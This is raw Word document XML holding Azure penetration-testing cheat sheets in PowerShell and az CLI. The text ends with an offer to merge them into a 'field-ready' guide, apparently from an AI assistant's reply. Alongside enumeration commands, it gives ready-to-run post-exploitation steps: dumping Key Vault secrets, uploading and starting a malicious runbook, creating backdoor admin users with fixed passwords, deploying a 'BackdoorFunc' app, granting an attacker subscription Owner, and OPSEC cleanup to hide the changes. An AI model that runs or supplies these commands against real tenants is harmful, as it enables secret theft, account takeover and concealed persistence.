      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Service Principals (Identify AppId &amp; Secrets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A651E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Get-AzADServicePrincipal | Select DisplayName, AppId, Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A22DEB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Enumerate Roles of Service Principals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8600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Get-AzRoleAssignment -ObjectId &lt;SP_ObjectId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79187CE0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📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check for Automation Accounts with Contributor Rights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B8E2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Get-AzAutomationAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E08E328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📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extract Key Vault Names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF347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Get-AzKeyVault | Select Name, Location, ResourceGroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8CCF9D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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempt Access to Secrets in a Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770582B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Get-AzKeyVaultSecret -VaultName &lt;VaultName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297487AA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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access depends on current user's/role's Key Vault policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76854EDC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402C78B8">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F406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🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Resource Abuse / Persistence Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6EAF6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💾</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload Malicious Script to Automation Account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830D21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Set-AzAutomationRunbook -AutomationAccountName &lt;Account&gt; -Name &lt;RunbookName&gt; -Path 'Payload.ps1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F84D1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Start-AzAutomationRunbook -AutomationAccountName &lt;Account&gt; -Name &lt;RunbookName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B14C0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💉</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Backdoor User (if privileged):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BFAED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New-AzADUser -DisplayName "admin" -UserPrincipalName "admin@domain.onmicrosoft.com" -AccountEnabled $true -Password "P@ssw0rd123!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA374AC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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy Malicious Function App:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFF36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New-AzFunctionApp -ResourceGroupName &lt;RG&gt; -Name "BackdoorFunc" -Location "eastus" -StorageAccountName &lt;Storage&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8A4A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📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set Up Persistent Role Assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A029C40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New-AzRoleAssignment -ObjectId &lt;AttackerId&gt; -RoleDefinitionName "Owner" -Scope "/subscriptions/&lt;SubID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11311274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05201446">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D9F65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🧹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cleanup (Optional / OPSEC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F8A276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Remove your backdoor accounts or role assignments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D484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Remove-AzRoleAssignment -ObjectId &lt;AttackerId&gt; -RoleDefinitionName "Owner"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549D91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Remove-AzADUser -ObjectId &lt;BackdoorUserId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19AA95" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB1F98E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Azure Penetration Testing Cheatsheet – az CLI Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFBE3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Adapted for Offensive Security – Post-Exploitation &amp; Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing Cheatsheet (CLI Version)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the az command-line interface. This is tailored for offensive operations and post-exploitation in Azure environments, focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>resource abuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F100C0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3AB66459">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B68525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1. Authentication &amp; Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E9A2E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Login (default browser-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0DCA5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17B667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Login with username/password (may bypass MFA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD8F1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 -u username@domain.com -p 'SuperSecret!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79285BEB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Use a service principal (if creds obtained):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5B477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 --service-principal -u APP_ID -p CLIENT_SECRET --tenant TENANT_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D1C598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Use access token (e.g., from token theft):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9653D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account get-access-token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581BA0F2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Set subscription context (required for many commands):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA3A1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account set --subscription SUBSCRIPTION_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38930D1F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0234768A">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B41C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>2. Azure Resource &amp; Identity Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6DE6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👤</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Azure AD users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50274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user list --query "[].{Name:displayName, UPN:userPrincipalName}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEEE2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👥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Groups and Members:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02826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group list --query "[].{Name:displayName, ID:objectId}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0452043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group member list --group GROUP_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59784E14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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Subscriptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758338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account list --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD88DB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📁</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Resource Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37DFB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group list --query "[].{Name:name, Location:location}" --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D9AF6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📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Resources in All Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EAD6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resource list --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF20A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List Role Assignments (RBAC reconnaissance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25B28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role assignment list --all --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E3CBB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31B43532">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EACB66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3. Privilege Escalation Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DECA3D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>Enumerate Service Principals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780155C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sp list --all --query "[].{Name:displayName, AppID:appId}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645C34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Enumerate App Secrets (if permissions allow):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D60ABE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app credential list --id APP_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF3FC4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🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> List Key Vaults:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E184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keyvault list --output table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966EA2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🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempt to list secrets in a Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3101F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keyvault secret list --vault-name VAULT_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25B5AD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📂</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Try to dump secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B7903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keyvault secret show --vault-name VAULT_NAME --name SECRET_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124EDDE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lastRenderedPageBreak/>
        <w:pict w14:anchorId="69698752">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C62D9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🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Resource Abuse &amp; Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD01928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🧬</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy Malicious Function App:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361CD7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functionapp create --resource-group RG --consumption-plan-location eastus \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A139E4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--runtime powershell --name backdoorfunc --storage-account YOURSTORAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABDA0B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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add Attacker as Subscription Owner (if permissions allow):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8A01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role assignment create --assignee ATTACKER_OBJECT_ID \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581EF1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--role "Owner" --scope /subscriptions/SUBSCRIPTION_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD23C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🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create New User in Azure AD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4713A4B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user create --display-name attacker --user-principal-name attacker@domain.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A335F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--password P@ssw0rd123 --force-change-password-next-login false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59CF4C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10794290">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72618A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🧹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cleanup (OPSEC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214B72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🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove role assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC46DE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role assignment delete --assignee ATTACKER_OBJECT_ID --role "Owner"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9ED7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❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove malicious user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D8F73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ad user delete --id attacker@domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9160F6" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A417EA2" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA3C858" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F49BA59" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure PenTest Cheatsheet – PowerShell (Az Module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7ED520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Focus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Account Discovery, Resource Enumeration, and Target Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC322EF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16FB45C3">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2023D5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1. Azure Context &amp; Subscription Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B89B5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saved contexts (including tokens):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AEAAB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Get-AzContext -ListAvailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8E129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Get current context details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42CD3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 = Get-AzContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6AED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$context.Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E200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$context.Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EC584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all accessible subscriptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C3C2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Get-AzSubscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCB741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Switch subscription context (critical for scoped access):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F019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Select-AzSubscription -SubscriptionId "SUBSCRIPTION_ID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CFAE9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Get role assignments for current identity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19529C8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Get-AzRoleAssignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CBA3F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40B00D33">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791C160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🗂️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Resource &amp; Infrastructure Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB46C72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all Azure resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB132D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7813A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resource groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2546D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Get-AzResourceGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C8059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Enumerate storage accounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474BE0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Get-AzStorageAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB21BB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lastRenderedPageBreak/>
        <w:pict w14:anchorId="3CF742AE">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939E13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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Web Apps &amp; Identity Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8101FA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Azure AD applications (OAuth backdoor targets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3579E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Get-AzADApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91B76E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Azure Web Apps (App Services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336D91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Get-AzWebApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A342BC9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74C5EF4A">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80C0B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>4. SQL Server &amp; Database Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D551D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Azure SQL servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69671B7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33958D95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SQL databases (per server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B654F7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Get-AzSqlDatabase -ServerName "SERVER_NAME" -ResourceGroupName "RG_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A57260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SQL Server firewall rules (check for IP bypasses):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E219BE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Get-AzSqlServerFirewallRule -ServerName "SERVER_NAME" -ResourceGroupName "RG_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A679EC7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Azure AD Admins on SQL Servers (lateral movement potential):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442FD4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Get-AzSqlServerActiveDirectoryAdministrator -ServerName "SERVER_NAME" -ResourceGroupName "RG_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC57FB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879E12B">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C7E5F7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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Automation Account Recon (Runbooks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE0DE5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all Automation Accounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7E9E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Get-AzAutomationAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D40E7D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runbooks for a specific automation account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CC2A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Get-AzAutomationRunbook -AutomationAccountName "ACCOUNT_NAME" -ResourceGroupName "RG_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56035F92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Export a Runbook (inspect for credentials or logic flaws):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76500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Export-AzAutomationRunbook -AutomationAccountName "ACCOUNT_NAME" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8531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-ResourceGroupName "RG_NAME" -Name "RUNBOOK_NAME" -OutputFolder "C:\Temp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C95912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26C00F0E">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B0A1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Would you like this merged with the CLI version in a full field-ready PDF or Markdown guide?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166DF1D7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E37969" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB55C61" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A5C7A9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/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🛡️</w:t>
      </w:r>
